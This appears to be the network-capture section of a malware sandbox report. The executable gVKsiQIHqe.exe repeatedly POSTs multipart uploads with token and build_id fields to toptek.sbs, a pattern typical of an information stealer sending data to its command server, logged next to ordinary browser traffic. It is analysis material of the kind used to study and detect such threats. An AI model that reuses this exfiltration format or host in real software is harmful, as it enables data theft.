2024-12-23 05:57:32 UTC | 489 | OUT | Data Ascii: ------HDBAI5PZC2VAAAAIM790Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------HDBAI5PZC2VAAAAIM790Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------HDBAI5PZC2VAAAAIM790Cont
2024-12-23 05:57:33 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:57:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:57:33 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49716 | 142.250.181.132 | 443 | 6156 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:57:35 UTC | 623 | OUT | GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
Host: www.google.com
Connection: keep-alive
X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCJDKzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-12-23 05:57:36 UTC | 1266 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 05:57:36 GMT
Pragma: no-cache
Expires: -1
Cache-Control: no-cache, must-revalidate
Content-Type: text/javascript; charset=UTF-8
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-2P0hIpnSwZMhabdCAJkpLA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
Accept-CH: Sec-CH-Prefers-Color-Scheme
Accept-CH: Sec-CH-UA-Form-Factors
Accept-CH: Sec-CH-UA-Platform
Accept-CH: Sec-CH-UA-Platform-Version
Accept-CH: Sec-CH-UA-Full-Version
Accept-CH: Sec-CH-UA-Arch
Accept-CH: Sec-CH-UA-Model
Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Content-Disposition: attachment; filename="f.txt"
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49713 | 142.250.181.132 | 443 | 6156 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:57:35 UTC | 353 | OUT | GET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49714 | 142.250.181.132 | 443 | 6156 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:57:35 UTC | 526 | OUT | GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCJDKzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
2024-12-23 05:57:36 UTC | 1018 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Version: 705503573
                                                                                                                                                                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:36 GMT
                                                                                                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Data Ascii: rn[]};Gd\u003dfunction(a){return new _.Fd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Hd\u003dglobalThis.trustedTypes;_.Id\u003dclass{constructor(a){this.i\u003da}toString(){return this.i}};_.Jd\u003dnew _.Id(\"about:inv
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:36 UTC1390INData Raw: 2e 59 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 49 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 49 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 58 64 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 5a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e
                                                                                                                                                                                                                                                                                    Data Ascii: .Yd\u003dfunction(a){if(a instanceof _.Id)if(a instanceof _.Id)a\u003da.i;else throw Error(\"F\");else a\u003d_.Xd(a);return a};_.Zd\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(c\u003d\"document\"in b?b.document:b).querySelector)\u003d\u003dn
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:36 UTC1390INData Raw: 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 6b 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 79 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 6f 72 5c 22 3f 61 2e 68 74 6d 6c 46 6f 72 5c 75 30 30 33 64 63 3a 6a 65
                                                                                                                                                                                                                                                                                    Data Ascii: orAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]||null));return a||null};\n_.ke\u003dfunction(a,b){_.yb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"class\"?a.className\u003dc:d\u003d\u003d\"for\"?a.htmlFor\u003dc:je


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49715 | 142.250.181.132 | 443 | 6156 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:57:35 UTC | 353 | OUT | GET /async/newtab_promos HTTP/1.1
Host: www.google.com
Connection: keep-alive
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-12-23 05:57:36 UTC | 933 | IN | HTTP/1.1 200 OK
Version: 705503573
Content-Type: application/json; charset=UTF-8
X-Content-Type-Options: nosniff
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
Accept-CH: Sec-CH-UA-Form-Factors
Accept-CH: Sec-CH-UA-Platform
Accept-CH: Sec-CH-UA-Platform-Version
Accept-CH: Sec-CH-UA-Full-Version
Accept-CH: Sec-CH-UA-Arch
Accept-CH: Sec-CH-UA-Model
Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Content-Disposition: attachment; filename="f.txt"
Date: Mon, 23 Dec 2024 05:57:36 GMT
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
2024-12-23 05:57:36 UTC | 35 | IN | Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-23 05:57:36 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49747 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:57:40 UTC | 322 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HLNYCBIMYUSRIEC26FKN
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 505
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:57:40 UTC | 505 | OUT | Data Ascii: ------HLNYCBIMYUSRIEC26FKNContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------HLNYCBIMYUSRIEC26FKNContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------HLNYCBIMYUSRIEC26FKNCont
2024-12-23 05:57:41 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:57:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:57:41 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49749 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:57:41 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FK68QQ16FUSRIECT0ZMG
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 213453
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:57:41 UTC | 16355 | OUT | Data Ascii: ------FK68QQ16FUSRIECT0ZMGContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------FK68QQ16FUSRIECT0ZMGContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------FK68QQ16FUSRIECT0ZMGCont
2024-12-23 05:57:43 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:57:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49756 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:57:43 UTC | 324 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----R1D2DTRQIEU37YU3OPPZ
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 55081
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:57:43 UTC | 16355 | OUT | Data Ascii:
------R1D2DTRQIEU37YU3OPPZ
Content-Disposition: form-data; name="token"

56d79d211678d143c3e6bd8262e8a87a
------R1D2DTRQIEU37YU3OPPZ
Content-Disposition: form-data; name="build_id"

fd61cf430a3abb74efa4762c20194727
------R1D2DTRQIEU37YU3OPPZ
Cont
2024-12-23 05:57:45 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:57:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:57:45 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 49762 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:57:45 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----9ZUS2DTRQIE3EUS26P8G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 142457
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:45 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 39 5a 55 53 32 44 54 52 51 49 45 33 45 55 53 32 36 50 38 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 39 5a 55 53 32 44 54 52 51 49 45 33 45 55 53 32 36 50 38 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 39 5a 55 53 32 44 54 52 51 49 45 33 45 55 53 32 36 50 38 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------9ZUS2DTRQIE3EUS26P8GContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------9ZUS2DTRQIE3EUS26P8GContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------9ZUS2DTRQIE3EUS26P8GCont
2024-12-23 05:57:47 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:57:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:57:47 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 49768 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:57:46 UTC | 322 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CJ5X4E3W4EUAIEKXL6FK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 493
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:57:46 UTC | 493 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 43 4a 35 58 34 45 33 57 34 45 55 41 49 45 4b 58 4c 36 46 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 43 4a 35 58 34 45 33 57 34 45 55 41 49 45 4b 58 4c 36 46 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 43 4a 35 58 34 45 33 57 34 45 55 41 49 45 4b 58 4c 36 46 4b 0d 0a 43 6f 6e 74
Data Ascii: ------CJ5X4E3W4EUAIEKXL6FKContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------CJ5X4E3W4EUAIEKXL6FKContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------CJ5X4E3W4EUAIEKXL6FKCont
2024-12-23 05:57:48 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:57:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:57:48 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 49795 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:57:54 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----ECBASJEKF37QIEU37QQI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 3165
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:57:54 UTC | 3165 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 45 43 42 41 53 4a 45 4b 46 33 37 51 49 45 55 33 37 51 51 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 41 53 4a 45 4b 46 33 37 51 49 45 55 33 37 51 51 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 41 53 4a 45 4b 46 33 37 51 49 45 55 33 37 51 51 49 0d 0a 43 6f 6e 74
Data Ascii: ------ECBASJEKF37QIEU37QQIContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------ECBASJEKF37QIEU37QQIContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------ECBASJEKF37QIEU37QQICont
2024-12-23 05:57:55 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:57:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:57:55 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 49807 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:57:55 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----YU3OPPZC2VAIM790RI5P
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 207993
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:55 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 59 55 33 4f 50 50 5a 43 32 56 41 49 4d 37 39 30 52 49 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 59 55 33 4f 50 50 5a 43 32 56 41 49 4d 37 39 30 52 49 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 59 55 33 4f 50 50 5a 43 32 56 41 49 4d 37 39 30 52 49 35 50 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------YU3OPPZC2VAIM790RI5PContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------YU3OPPZC2VAIM790RI5PContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------YU3OPPZC2VAIM790RI5PCont
2024-12-23 05:57:57 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:56 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 49821 | 172.64.41.3 | 443 | 7432 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:57:55 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:55 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP
